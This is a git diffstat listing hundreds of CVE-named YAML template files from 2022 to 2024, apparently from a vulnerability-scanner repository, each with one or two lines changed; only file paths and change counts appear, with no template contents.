http/cves/2022/CVE-2022-25568.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26159.yaml | 2 +- http/cves/2022/CVE-2022-26233.yaml | 2 +- http/cves/2022/CVE-2022-26263.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-2633.yaml | 2 +- http/cves/2022/CVE-2022-26352.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27849.yaml | 2 +- http/cves/2022/CVE-2022-27926.yaml | 2 +- http/cves/2022/CVE-2022-27927.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-27985.yaml | 2 +- http/cves/2022/CVE-2022-28022.yaml | 2 +- http/cves/2022/CVE-2022-28023.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28080.yaml | 2 +- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 2 +- http/cves/2022/CVE-2022-28923.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29004.yaml | 2 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29007.yaml | 2 +- http/cves/2022/CVE-2022-29009.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 2 +- http/cves/2022/CVE-2022-29078.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29383.yaml | 2 +- http/cves/2022/CVE-2022-29455.yaml | 2 +- http/cves/2022/CVE-2022-29464.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30512.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30514.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-3062.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 2 +- http/cves/2022/CVE-2022-31269.yaml | 2 +- http/cves/2022/CVE-2022-31299.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31474.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31798.yaml | 2 +- http/cves/2022/CVE-2022-31814.yaml | 2 +- http/cves/2022/CVE-2022-31845.yaml | 2 +- http/cves/2022/CVE-2022-31846.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31879.yaml | 2 +- http/cves/2022/CVE-2022-31974.yaml | 2 +- http/cves/2022/CVE-2022-31975.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-31980.yaml | 2 +- http/cves/2022/CVE-2022-31981.yaml | 2 +- http/cves/2022/CVE-2022-31982.yaml | 2 +- http/cves/2022/CVE-2022-31983.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32007.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32094.yaml | 2 +- http/cves/2022/CVE-2022-32195.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 2 +- http/cves/2022/CVE-2022-32429.yaml | 2 +- http/cves/2022/CVE-2022-32444.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34046.yaml | 2 +- http/cves/2022/CVE-2022-34047.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34093.yaml | 2 +- http/cves/2022/CVE-2022-34094.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-34590.yaml | 2 +- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-3484.yaml | 2 +- http/cves/2022/CVE-2022-3506.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 2 +- http/cves/2022/CVE-2022-35416.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-35653.yaml | 2 +- http/cves/2022/CVE-2022-3578.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36553.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-36883.yaml | 2 +- http/cves/2022/CVE-2022-37042.yaml | 2 +- http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37190.yaml | 2 +- http/cves/2022/CVE-2022-37191.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-38295.yaml | 2 +- http/cves/2022/CVE-2022-38296.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38467.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-38794.yaml | 2 +- http/cves/2022/CVE-2022-38817.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 2 +- http/cves/2022/CVE-2022-3908.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 2 +- http/cves/2022/CVE-2022-3933.yaml | 2 +- http/cves/2022/CVE-2022-3934.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-39986.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 2 +- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40083.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 2 +- http/cves/2022/CVE-2022-40359.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4060.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40684.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 2 +- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40879.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-4140.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 2 +- http/cves/2022/CVE-2022-41840.yaml | 2 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42095.yaml | 2 +- http/cves/2022/CVE-2022-42096.yaml | 2 +- http/cves/2022/CVE-2022-42233.yaml | 2 +- http/cves/2022/CVE-2022-4260.yaml | 2 +- http/cves/2022/CVE-2022-42746.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4295.yaml | 2 +- http/cves/2022/CVE-2022-4301.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43016.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4305.yaml | 2 +- http/cves/2022/CVE-2022-4306.yaml | 2 +- http/cves/2022/CVE-2022-43140.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-4320.yaml | 2 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-4325.yaml | 2 +- http/cves/2022/CVE-2022-4328.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-44291.yaml | 2 +- http/cves/2022/CVE-2022-4447.yaml | 2 +- http/cves/2022/CVE-2022-44877.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- http/cves/2022/CVE-2022-44948.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45037.yaml | 2 +- http/cves/2022/CVE-2022-45038.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 2 +- http/cves/2022/CVE-2022-45362.yaml | 2 +- http/cves/2022/CVE-2022-45365.yaml | 3 +-- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 2 +- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46020.yaml | 2 +- http/cves/2022/CVE-2022-46071.yaml | 2 +- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 +- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-46443.yaml | 2 +- http/cves/2022/CVE-2022-46463.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-46934.yaml | 2 +- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47003.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47615.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48012.yaml | 2 +- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 2 +- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2023/CVE-2023-0099.yaml | 2 +- http/cves/2023/CVE-2023-0126.yaml | 2 +- http/cves/2023/CVE-2023-0236.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0297.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 2 +- http/cves/2023/CVE-2023-0448.yaml | 2 +- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0527.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0563.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0602.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0777.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-0942.yaml | 2 +- http/cves/2023/CVE-2023-0947.yaml | 2 +- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 2 +- http/cves/2023/CVE-2023-1020.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 2 +- http/cves/2023/CVE-2023-1263.yaml | 2 +- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 2 +- http/cves/2023/CVE-2023-1454.yaml | 2 +- http/cves/2023/CVE-2023-1496.yaml | 2 +- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 2 +- http/cves/2023/CVE-2023-1698.yaml | 2 +- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1780.yaml | 2 +- http/cves/2023/CVE-2023-1835.yaml | 2 +- http/cves/2023/CVE-2023-1880.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 2 +- http/cves/2023/CVE-2023-20198.yaml | 2 +- http/cves/2023/CVE-2023-2023.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-20888.yaml | 2 +- http/cves/2023/CVE-2023-20889.yaml | 2 +- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 2 +- http/cves/2023/CVE-2023-2224.yaml | 2 +- http/cves/2023/CVE-2023-22432.yaml | 2 +- http/cves/2023/CVE-2023-22463.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22480.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 2 +- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-22620.yaml | 2 +- http/cves/2023/CVE-2023-2272.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23333.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-23491.yaml | 2 +- http/cves/2023/CVE-2023-23492.yaml | 2 +- http/cves/2023/CVE-2023-2356.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-24243.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24488.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-2479.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-25157.yaml | 2 +- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-25717.yaml | 2 +- http/cves/2023/CVE-2023-26035.yaml | 2 +- http/cves/2023/CVE-2023-26067.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26347.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-26469.yaml | 2 +- http/cves/2023/CVE-2023-2648.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27179.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 2 +- http/cves/2023/CVE-2023-27350.yaml | 2 +- http/cves/2023/CVE-2023-27372.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-2766.yaml | 2 +- http/cves/2023/CVE-2023-2779.yaml | 2 +- http/cves/2023/CVE-2023-2780.yaml | 2 +- http/cves/2023/CVE-2023-27922.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-28121.yaml | 2 +- http/cves/2023/CVE-2023-2813.yaml | 2 +- http/cves/2023/CVE-2023-2822.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29084.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29357.yaml | 2 +- http/cves/2023/CVE-2023-29439.yaml | 2 +- http/cves/2023/CVE-2023-29489.yaml | 2 +- http/cves/2023/CVE-2023-29622.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 2 +- http/cves/2023/CVE-2023-2982.yaml | 2 +- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 2 +- http/cves/2023/CVE-2023-29922.yaml | 2 +- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30013.yaml | 2 +- http/cves/2023/CVE-2023-30019.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 2 +- http/cves/2023/CVE-2023-30256.yaml | 2 +- http/cves/2023/CVE-2023-30258.yaml | 2 +- http/cves/2023/CVE-2023-30534.yaml | 2 +- http/cves/2023/CVE-2023-30625.yaml | 2 +- http/cves/2023/CVE-2023-30777.yaml | 2 +- http/cves/2023/CVE-2023-30868.yaml | 2 +- http/cves/2023/CVE-2023-30943.yaml | 2 +- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32243.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 2 +- http/cves/2023/CVE-2023-33338.yaml | 2 +- http/cves/2023/CVE-2023-33405.yaml | 2 +- http/cves/2023/CVE-2023-33439.yaml | 2 +- http/cves/2023/CVE-2023-33440.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2023/CVE-2023-33510.yaml | 2 +- http/cves/2023/CVE-2023-33568.yaml | 2 +- http/cves/2023/CVE-2023-33584.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 2 +- http/cves/2023/CVE-2023-3368.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-34124.yaml | 2 +- http/cves/2023/CVE-2023-34192.yaml | 2 +- http/cves/2023/CVE-2023-34259.yaml | 2 +- http/cves/2023/CVE-2023-34362.yaml | 2 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-35078.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 2 +- http/cves/2023/CVE-2023-35844.yaml | 2 +- http/cves/2023/CVE-2023-35885.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2023/CVE-2023-36844.yaml | 2 +- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-36934.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 2 +- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37266.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 2 +- http/cves/2023/CVE-2023-37462.yaml | 2 +- http/cves/2023/CVE-2023-37474.yaml | 2 +- http/cves/2023/CVE-2023-37580.yaml | 2 +- http/cves/2023/CVE-2023-37629.yaml | 2 +- http/cves/2023/CVE-2023-3765.yaml | 2 +- http/cves/2023/CVE-2023-37679.yaml | 2 +- http/cves/2023/CVE-2023-37728.yaml | 2 +- http/cves/2023/CVE-2023-37979.yaml | 2 +- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-3844.yaml | 2 +- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3846.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 2 +- http/cves/2023/CVE-2023-3849.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 2 +- http/cves/2023/CVE-2023-38646.yaml | 2 +- http/cves/2023/CVE-2023-39002.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39110.yaml | 2 +- http/cves/2023/CVE-2023-39141.yaml | 2 +- http/cves/2023/CVE-2023-39143.yaml | 2 +- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39677.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-40208.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 2 +- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-41109.yaml | 2 +- http/cves/2023/CVE-2023-4111.yaml | 2 +- http/cves/2023/CVE-2023-4112.yaml | 2 +- http/cves/2023/CVE-2023-4113.yaml | 2 +- http/cves/2023/CVE-2023-4114.yaml | 2 +- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-41265.yaml | 2 +- http/cves/2023/CVE-2023-41266.yaml | 2 +- http/cves/2023/CVE-2023-4148.yaml | 2 +- http/cves/2023/CVE-2023-41538.yaml | 2 +- http/cves/2023/CVE-2023-41642.yaml | 2 +- http/cves/2023/CVE-2023-4168.yaml | 2 +- http/cves/2023/CVE-2023-4169.yaml | 2 +- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-4174.yaml | 2 +- http/cves/2023/CVE-2023-41763.yaml | 2 +- http/cves/2023/CVE-2023-41892.yaml | 2 +- http/cves/2023/CVE-2023-42343.yaml | 2 +- http/cves/2023/CVE-2023-42442.yaml | 2 +- http/cves/2023/CVE-2023-42793.yaml | 2 +- http/cves/2023/CVE-2023-43261.yaml | 2 +- http/cves/2023/CVE-2023-43325.yaml | 2 +- http/cves/2023/CVE-2023-43326.yaml | 2 +- http/cves/2023/CVE-2023-43795.yaml | 2 +- http/cves/2023/CVE-2023-4415.yaml | 2 +- http/cves/2023/CVE-2023-44353.yaml | 2 +- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-4547.yaml | 2 +- http/cves/2023/CVE-2023-45542.yaml | 2 +- http/cves/2023/CVE-2023-4568.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-4596.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 2 +- http/cves/2023/CVE-2023-46574.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-4714.yaml | 2 +- http/cves/2023/CVE-2023-47246.yaml | 2 +- http/cves/2023/CVE-2023-49070.yaml | 2 +- http/cves/2023/CVE-2023-49103.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-5074.yaml | 2 +- http/cves/2023/CVE-2023-50917.yaml | 2 +- http/cves/2023/CVE-2023-50968.yaml | 2 +- http/cves/2023/CVE-2023-51467.yaml | 2 +- http/cves/2023/CVE-2023-5244.yaml | 2 +- http/cves/2023/CVE-2023-5360.yaml | 2 +- http/cves/2023/CVE-2023-5375.yaml | 2 +- http/cves/2023/CVE-2023-5556.yaml | 2 +- http/cves/2023/CVE-2023-6018.yaml | 2 +- http/cves/2023/CVE-2023-6020.yaml | 2 +- http/cves/2023/CVE-2023-6021.yaml | 2 +- http/cves/2023/CVE-2023-6038.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6379.yaml | 2 +- http/cves/2023/CVE-2023-6380.yaml | 2 +- http/cves/2023/CVE-2023-6553.yaml | 2 +- http/cves/2023/CVE-2023-6623.yaml | 2 +- http/cves/2023/CVE-2023-7028.yaml | 2 +- http/cves/2024/CVE-2024-0352.yaml | 2 +- 